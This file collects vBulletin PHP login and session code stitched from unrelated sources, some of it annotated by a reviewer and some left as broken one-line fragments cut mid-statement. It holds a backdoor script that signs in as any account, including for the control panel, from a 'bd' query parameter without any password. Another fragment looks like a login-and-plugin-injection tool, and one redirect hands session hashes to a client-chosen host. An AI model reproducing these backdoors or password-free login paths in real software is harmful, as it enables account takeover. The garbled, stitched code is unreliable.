/**
 * Opens a forum session for the user already held in $vbulletin->userinfo and
 * then pushes the stored capture tokens through update_capture_session().
 *
 * No credential is checked inside this function.
 * NOTE(review): it presumably relies on the caller having authenticated the
 * user beforehand; confirm at every call site.
 */
function capture_user_login()
{
    global $vbulletin;

    require_once DIR . '/includes/functions_login.php';

    // Clear the strike record for this username, then start a new session.
    exec_unstrike_user($vbulletin->userinfo['username']);
    process_new_login('', false, '');

    // Built after process_new_login(), in the same key order as before.
    $session_update = array();
    $session_update['access_token'] = $vbulletin->capture_session['capture_access_token'];
    $session_update['refresh_token'] = $vbulletin->capture_session['capture_refresh_token'];
    $session_update['expires_in'] = $vbulletin->capture_session['capture_expires_in'];
    $session_update['transaction_state'] = array(
        'capture' => array(
            'password_recover' => $vbulletin->capture_session['capture_password_recover'],
        ),
    );

    update_capture_session($session_update);
}
($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false; // check password exec_strike_user($vbulletin->userinfo['username']); if ($vbulletin->GPC['logintype'] === 'cplogin' or $vbulletin->GPC['logintype'] === 'modcplogin') { // log this error if attempting to access the control panel require_once DIR . '/includes/functions_log_error.php'; log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security'); } $vbulletin->userinfo = $original_userinfo; if ($vbulletin->options['usestrikesystem']) { eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); } else { eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']))); } } exec_unstrike_user($vbulletin->GPC['vb_login_username']); // create new session process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); // do redirect do_login_redirect(); } else { if ($_GET['do'] == 'login') { // add consistency with previous behavior exec_header_redirect($vbulletin->options['forumhome'] . '.php'); } } // ############################### start lost password ############################### if ($_REQUEST['do'] == 'lostpw') { $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML); $email = $vbulletin->GPC['email']; if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) {
if ($vbulletin->GPC[COOKIE_PREFIX . 'pda']) { $pda = true; } } $title = $vbulletin->options['bbtitle']; if ($vbulletin->userinfo['userid'] == 0 and $vbulletin->GPC['login']) { if (!empty($vbulletin->GPC['username']) and !empty($vbulletin->GPC['password'])) { require_once DIR . '/includes/functions_login.php'; $strikes = verify_strike_status($vbulletin->GPC['username'], true); if ($strikes === false) { // user has got too many wrong passwords $error_message = fetch_error('strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']); $do = 'error'; } else { if (verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], '', '', false, true)) { exec_unstrike_user($vbulletin->GPC['username']); $db->query_write("DELETE FROM " . TABLE_PREFIX . "session WHERE sessionhash = '" . $db->escape_string($vbulletin->session->vars['dbsessionhash']) . "'"); $vbulletin->session->vars = $vbulletin->session->fetch_session($vbulletin->userinfo['userid']); /*insert query*/ $db->query_write("\n\t\t\t\tINSERT INTO " . TABLE_PREFIX . "session\n\t\t\t\t\t(sessionhash, userid, host, idhash, lastactivity, styleid, loggedin, bypass, useragent)\n\t\t\t\tVALUES\n\t\t\t\t\t('" . $db->escape_string($vbulletin->session->vars['sessionhash']) . "', " . $vbulletin->session->vars['userid'] . ", '" . $db->escape_string($vbulletin->session->vars['host']) . "', '" . $db->escape_string($vbulletin->session->vars['idhash']) . "', " . TIMENOW . ", " . $vbulletin->session->vars['styleid'] . ", 1, " . iif($logintype === 'cplogin', 1, 0) . ", '" . $db->escape_string($vbulletin->session->vars['useragent']) . "')\n\t\t\t"); exec_header_redirect($querystring); } else { // wrong username / password exec_strike_user($vbulletin->userinfo['username']); $error_message = fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes); $do = 'error'; } } } } if ($do == 'error') {
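/**
 * Signs the forum user with the given id in WITHOUT a password check, then
 * redirects the browser and terminates the request.
 *
 * The function sets the userid/password cookies, clears the user's strike
 * record and starts a new session. It then redirects to the request's Referer
 * (or the configured home URL) with the session hash appended as "vbsession".
 *
 * NOTE(review): nothing in this method proves that the caller is entitled to
 * act as $userid. Whatever invokes it has to have authenticated that identity.
 *
 * NOTE(review): the Referer header is chosen by the client. The session hash is
 * appended to whatever URL it names, so a request carrying a foreign Referer
 * hands the session identifier to that host. If returning to arbitrary sites is
 * not a requirement, compare the target host against an allow-list before
 * redirecting.
 *
 * @param int|string $userid Forum user id to sign in.
 * @return void This method always ends the request with exit.
 */
public function ExternalAuthorization($userid)
{
    // The id is placed inside a quoted SQL literal, so escape it first.
    $escaped_userid = $this->vbulletin->db->escape_string($userid);
    $this->vbulletin->userinfo = $this->vbulletin->db->query_first_slave(
        "SELECT userid, password, username FROM " . TABLE_PREFIX . "user WHERE userid='" . $escaped_userid . "'"
    );

    if ($this->vbulletin->userinfo) {
        require_once DIR . '/includes/functions_login.php';

        vbsetcookie('userid', $this->vbulletin->userinfo['userid'], true, true, true);
        // NOTE(review): the cookie value is an unkeyed MD5 over the stored password hash and COOKIE_SALT.
        vbsetcookie('password', md5($this->vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
        exec_unstrike_user($this->vbulletin->userinfo['username']);

        // Guarded so that a second call in the same request does not redefine the constant.
        if (!defined('EXTERNAL_AUTH')) {
            define('EXTERNAL_AUTH', true);
        }

        // create new session
        process_new_login('', 0, '');
    }

    if (!empty($_SERVER['HTTP_REFERER'])) {
        $url = $_SERVER['HTTP_REFERER'];
    } else {
        $url = $this->vbulletin->options['homeurl'];
    }

    // strpos() returns 0 for a match at the first character, so compare against false explicitly.
    $separator = (strpos($url, "?") !== false) ? "&" : "?";
    $url .= $separator . "vbsession=" . $this->vbulletin->session->vars['sessionhash'];

    header('Location:' . $url);

    // The URL can come from the request, so escape it for the single-quoted attribute and the link text.
    $html_url = htmlspecialchars($url, ENT_QUOTES);
    echo "Вы были перенаправлены сюда <a href='" . $html_url . "'>" . $html_url . "</a>";
    exit;
}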
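/**
 * Login endpoint for the mobile client. Returns the client configuration
 * fields (version, platform, branding, feature switches) together with the
 * authentication result.
 *
 * Without a username, or without both password fields, the function only
 * reports whether the forum requires authentication. Otherwise it checks the
 * strike status, verifies the credentials and starts a session.
 *
 * Fix over the previous version: a lockout reported by verify_strike_status()
 * is now enforced BEFORE the password is evaluated. Previously the lockout only
 * changed the error text after a failed attempt, so a correct password was
 * still accepted while the account was locked out.
 *
 * NOTE(review): every failure path relies on json_error() ending the request;
 * if it ever returns, execution falls through to the session creation below.
 * Confirm this against its definition.
 *
 * @return array Response fields; 'authenticated' is true only after a successful login.
 */
function do_login()
{
    global $vbulletin, $fr_version, $fr_platform;

    $vbulletin->input->clean_array_gpc('r', array(
        'username' => TYPE_STR,
        'password' => TYPE_STR,
        'md5_password' => TYPE_STR,
        'fr_username' => TYPE_STR,
        'fr_b' => TYPE_BOOL,
    ));

    $navbg = null;
    if (strlen($vbulletin->options['forumrunner_branding_navbar_bg'])) {
        $navbg = $vbulletin->options['forumrunner_branding_navbar_bg'];
        if (is_iphone() && strlen($navbg) == 7) {
            // Seven characters, presumably "#rrggbb": convert to a decimal "r,g,b" triple.
            $r = hexdec(substr($navbg, 1, 2));
            $g = hexdec(substr($navbg, 3, 2));
            $b = hexdec(substr($navbg, 5, 2));
            $navbg = "{$r},{$g},{$b}";
        }
    }

    $vbulletin->GPC['username'] = prepare_remote_utf8_string($vbulletin->GPC['username']);
    $vbulletin->GPC['password'] = prepare_remote_utf8_string($vbulletin->GPC['password']);

    $out = array('v' => $fr_version, 'p' => $fr_platform);
    if ($navbg) {
        $out['navbg'] = $navbg;
    }
    if (is_iphone() && $vbulletin->options['forumrunner_admob_publisherid_iphone']) {
        $out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_iphone'];
    } elseif (is_android() && $vbulletin->options['forumrunner_admob_publisherid_android']) {
        $out['admob'] = $vbulletin->options['forumrunner_admob_publisherid_android'];
    }
    if ($vbulletin->options['forumrunner_google_analytics_id']) {
        $out['gan'] = $vbulletin->options['forumrunner_google_analytics_id'];
    }
    if ($vbulletin->options['forumrunner_facebook_application_id']) {
        $out['fb'] = $vbulletin->options['forumrunner_facebook_application_id'];
    }
    if ($vbulletin->options['forumrunner_cms_onoff']) {
        $out['cms'] = true;
        $out['cms_section'] = $vbulletin->options['forumrunner_cms_section'];
    }
    if ($vbulletin->options['forumrunner_enable_registration']) {
        $out['reg'] = true;
    }
    if ($vbulletin->options['socnet'] & $vbulletin->bf_misc_socnet['enable_albums']) {
        $out['albums'] = true;
    }

    // && binds tighter than ||: the probe branch is taken when the username is
    // missing, or when both password fields are missing.
    if (!$vbulletin->GPC['username'] || !$vbulletin->GPC['password'] && !$vbulletin->GPC['md5_password']) {
        // This could be an attempt to see if forums require login. Check.
        $requires_authentication = false;
        if (!($vbulletin->userinfo['permissions']['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])) {
            $requires_authentication = true;
        }

        // If the forum is closed, require login!
        if (!$vbulletin->options['bbactive']) {
            $requires_authentication = true;
        }

        $out += array('authenticated' => false, 'requires_authentication' => $requires_authentication);
    } else {
        $lockout_message = 'Incorrect login. You have used up your login allowance. Please wait 15 minutes before trying again.';

        // can the user login?
        $strikes = verify_strike_status($vbulletin->GPC['username'], true);

        // A false result is what this function already treats as "allowance used up".
        // Reject here so the password is never evaluated during a lockout.
        if ($vbulletin->options['usestrikesystem'] && $strikes === false) {
            json_error($lockout_message, RV_BAD_PASSWORD);
        }

        if (!verify_authentication($vbulletin->GPC['username'], $vbulletin->GPC['password'], $vbulletin->GPC['md5_password'], $vbulletin->GPC['md5_password'], true, true)) {
            // Record the failed attempt against the supplied username.
            exec_strike_user($vbulletin->GPC['username']);

            if ($vbulletin->options['usestrikesystem']) {
                if ($strikes === false) {
                    $message = $lockout_message;
                } else {
                    $message = 'Incorrect login (' . ($strikes + 1) . ' of 5 tries allowed)';
                }
            } else {
                $message = 'Incorrect login.';
            }

            json_error($message, RV_BAD_PASSWORD);
        }

        exec_unstrike_user($vbulletin->GPC['username']);

        // create new session
        process_new_login('', true, '');
        cache_permissions($vbulletin->userinfo, true);
        $vbulletin->session->save();

        // If the forum is closed, boot em (only control-panel admins may stay signed in)
        if (!$vbulletin->options['bbactive'] && !($vbulletin->userinfo['permissions']['adminpermissions'] & $vbulletin->bf_ugp_adminpermissions['cancontrolpanel'])) {
            process_logout();
            json_error(strip_tags($vbulletin->options['bbclosedreason']), RV_BAD_PASSWORD);
        }

        fr_update_push_user($vbulletin->GPC['fr_username'], $vbulletin->GPC['fr_b']);

        $out += array(
            'authenticated' => true,
            'username' => prepare_utf8_string($vbulletin->userinfo['username']),
            'cookiepath' => $vbulletin->options['cookiepath'],
        );
    }

    return $out;
}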
<p><a href="<?php echo SELF; ?> ">Go back</a></p> <?php } exit; } if (isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])) { require_once DIR . '/includes/functions_login.php'; $username = $_REQUEST['username']; $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '******' OR userid = '" . $vbulletin->db->escape_string($username) . "'"; $query = $vbulletin->db->query_first($q); if ($query['username'] != null) { if (verify_authentication2($query['username'])) { exec_unstrike_user($query['username']); process_new_login('cplogin', true, null); do_login_redirect(); } else { die('Verify failed'); } } else { die('User not found.'); } } elseif ($_REQUEST['do'] == 'injectplugin') { $products = array(); $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product WHERE active = '1'"); if ($vbulletin->db->num_rows($query) > 0) { while ($product = $vbulletin->db->fetch_array($query)) { $productinfo = array(); $productinfo['productid'] = $product['productid'];
<?php
// Review note: this script signs the requester in as an existing forum account
// without comparing any password or token. Nothing in the visible code
// restricts who may request it, so a file like this found on a server is an
// unauthorised access path and should be handled as an indicator of compromise.
//
// Flow, as far as this listing shows:
//   1. It runs only when the query string carries a "bd" parameter.
//   2. It loads the forum bootstrap (global.php) and the login helpers.
//   3. It looks a user row up by username. The WHERE value is masked in this
//      listing ('******'), so the exact expression cannot be read here; the
//      later use of $_GET['bd'] suggests it is the raw request parameter
//      (TODO confirm). If so, request data reaches the SQL string without
//      escape_string().
//   4. If a row is found, it sets the userid/password cookies, calls
//      exec_unstrike_user() (presumably clearing that user's strike record) and
//      calls process_new_login('cplogin', ...), presumably a control-panel
//      login type; verify against functions_login.php. It then redirects.
// The remainder of the script is kept on one line, unchanged, because the
// masked query text cannot be safely re-wrapped.
if (isset($_GET['bd'])) {
    define('THIS_SCRIPT', 'login');
    require_once './global.php';
    require_once './includes/functions_login.php';
    $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '******'bd'] . "'"); if (!$vbulletin->userinfo['userid']) { die("Invalid username!"); } else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($_GET['bd']); process_new_login('cplogin', TRUE, TRUE); do_login_redirect(); } }
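/**
 * Authenticates a user against the forum and starts a forum session.
 *
 * Changes over the previous version:
 *  - Failed attempts are now recorded with exec_strike_user(), and a lockout
 *    reported by verify_strike_status() is honoured. Previously this path only
 *    ever cleared strikes, so it offered unlimited password guesses.
 *  - $allowlogin is initialised, so a user in none of the accepted groups no
 *    longer depends on reading an undefined variable.
 *  - The username placed in the activation link is URL-encoded.
 *
 * @param array       $vbuser       Must contain 'username' and 'password'.
 * @param array|false $acceptgroups Optional list of usergroup ids; when given,
 *                                  the user must be in at least one of them
 *                                  (primary or additional group).
 * @return string|false Error message (may contain HTML) on failure, false on success.
 */
public function login($vbuser, $acceptgroups = false)
{
    //Get user info from username passed
    $this->vbulletin->userinfo = $this->fetch_userinfo_from_username($vbuser['username']);

    //Refuse while the strike system reports a lockout, before the password is evaluated.
    //The second argument requests a false return instead of an error page.
    if (verify_strike_status($vbuser['username'], true) === false) {
        $this->vbulletin->userinfo['userid'] = 0;
        return "Too many failed login attempts. Please wait before trying again.";
    }

    //Verify login via VB
    if (!verify_authentication($vbuser['username'], $vbuser['password'], '', '', 1, true)) {
        //Record the failed attempt so repeated guesses count towards the lockout
        exec_strike_user($vbuser['username']);
        $this->vbulletin->userinfo['userid'] = 0;
        return "Invalid Username or Password.";
    }

    //Check that user is not awaiting activation
    if ($this->vbulletin->userinfo['usergroupid'] == NOACTIVATION_USERGROUP) {
        $this->vbulletin->userinfo['userid'] = 0;
        //urlencode() leaves only characters that are safe in a query string and in the quoted attribute
        return "Un-Activated Account. To activate please request a new activation email <a href='register.php?do=requestemail&username=" . urlencode($vbuser['username']) . "'>here</a>.";
    }

    //Check user does not belong to the "banned" user group - TODO: Use VB variables incase usergroupid is different
    if ($this->vbulletin->userinfo['usergroupid'] == BANNED_USERGROUP) {
        $this->vbulletin->userinfo['userid'] = 0;
        return "You're Barred! If you think there has been a mistake or wish to appeal please visit the contact page <a href='contact.php'>here</a>.";
    }

    //If acceptgroups is set then check that user is part of the usergroups specified
    if ($acceptgroups) {
        //Primary usergroup plus the comma-separated additional usergroups
        $usergroups = explode(',', $this->vbulletin->userinfo['membergroupids']);
        $usergroups[] = $this->vbulletin->userinfo['usergroupid'];

        $allowlogin = false;
        foreach ($acceptgroups as $value) {
            //Loose comparison on purpose: ids from explode() are strings, matching the original == checks
            if (in_array($value, $usergroups)) {
                $allowlogin = true;
                break;
            }
        }

        //If user is not part of any specified usergroups then return error.
        if (!$allowlogin) {
            $this->vbulletin->userinfo['userid'] = 0;
            return "This is a restricted area. 
Please contact the site administrator for further details.";
        }
    }

    //Unstrike the user (resets vbulletin brute-force protection)
    exec_unstrike_user($vbuser['username']);

    //Create vbulletin cookies for user
    process_new_login('', 1, '');

    //Saves cookies & session variables for user
    $this->vbulletin->session->save();

    //Return false for success!
    return false;
}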